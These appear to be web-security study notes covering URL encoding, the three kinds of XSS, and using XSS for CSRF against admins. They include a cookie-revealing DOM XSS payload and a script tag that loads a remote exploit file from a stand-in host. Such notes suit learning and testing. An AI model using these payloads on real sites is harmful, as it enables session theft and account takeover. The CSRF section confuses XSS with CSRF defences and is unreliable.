Front Components & Vulns
URL Encode
space
%20
!
%21
"
%22
#
%23
$
%24
%
%25
&
%26
'
%27
(
%28
)
%29
A full character encoding table can be seen here
XSS
Reflected XSS
Occurs when user input is displayed on the page after processing (e.g., search result or error message).
Stored XSS
Occurs when user input is stored in the back end database and then displayed upon retrieval (e.g., posts or comments).
DOM XSS
Occurs when user input is directly shown in the browser and is written to an HTML DOM object (e.g., vulnerable username or page title).
Therefore, it may be possible for the same page to be vulnerable to XSS attacks. We can try to inject the following DOM XSS JavaScript code as a payload, which should show us the cookie value for the current user:
#"><img src=/ onerror=alert(document.cookie)>CSRF
CSRF can also be leveraged to attack admins and gain access to their accounts. Admins usually have access to sensitive functions, which can sometimes be used to attack and gain control over the back-end server (depending on the functionality provided to admins within a given web application). Following this example, instead of using JavaScript code that would return the session cookie, we would load a remote .js (JavaScript) file, as follows:
"><script src=//www.example.com/exploit.js></script>As for CSRF, many modern browsers have built-in anti-CSRF measures, which prevent automatically executing JavaScript code. Furthermore, many modern web applications have anti-CSRF measures, including certain HTTP headers and flags that can prevent automated requests (i.e., anti-CSRF token, or http-only/X-XSS-Protection).
Last updated